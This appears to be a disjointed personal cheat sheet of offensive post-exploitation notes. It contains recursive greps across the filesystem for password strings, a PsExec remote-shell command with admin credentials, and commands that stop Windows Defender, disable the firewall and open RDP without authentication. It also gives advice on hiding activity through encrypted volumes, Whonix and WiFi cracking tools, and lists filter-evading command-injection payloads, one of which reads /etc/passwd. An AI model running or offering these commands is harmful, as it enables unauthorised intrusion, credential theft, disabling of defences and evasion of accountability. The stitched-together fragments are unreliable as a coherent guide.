http://books.gigatux.nl/mirror/networksecuritytools/0596007949/networkst-CHP-7-SECT-4.html

Post Exploit Enumeration :

grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always

File uplaod through B64

PSexec Shells of Remote Systems

.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe

Disabling firewall/defender and enabling RDF for all

sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it's better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy

https://pastebin.com/raw/cRYvK4jb
here.

e: Effective
This means the capability is “activated”.

p: Permitted
This means the capability can be used/is allowed.

i: Inherited
The capability is kept by child/subprocesses upon execve() for example.

https://www.insecure.ws/linux/getcap_setcap.html

{echo,hello,world}
CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20a\x20b\x20c'&&echo$CMD
google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD